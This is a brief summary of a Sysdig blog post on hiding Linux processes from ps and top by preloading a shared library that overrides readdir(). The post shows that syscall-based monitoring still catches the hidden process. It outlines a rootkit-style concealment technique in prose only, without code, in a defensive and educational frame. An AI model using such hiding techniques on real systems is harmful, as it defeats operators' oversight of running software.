Hiding Linux processes for fun + profit
Blog post from Sysdig
Gianluca Borello explores the concept of hiding processes in Linux from monitoring tools like `ps` and `top`. By leveraging the dynamic linker's preloading feature, Borello demonstrates how to create a custom shared library that overrides the `readdir()` function in libc, effectively concealing a malicious script from standard process monitoring. The post discusses various methods to achieve process hiding, including modifying binaries and kernel system calls, but settles on the preloading technique for its simplicity and effectiveness. Despite successfully hiding the process from traditional tools, Borello shows that Sysdig, a system call-based monitoring tool, remains capable of detecting the hidden process due to its ability to inspect system calls directly. The experiment highlights the versatility of Linux's /proc file system and the challenges of completely concealing system activity, emphasizing the importance of monitoring both through system calls and file system data.
No tracked trend matches for this post yet.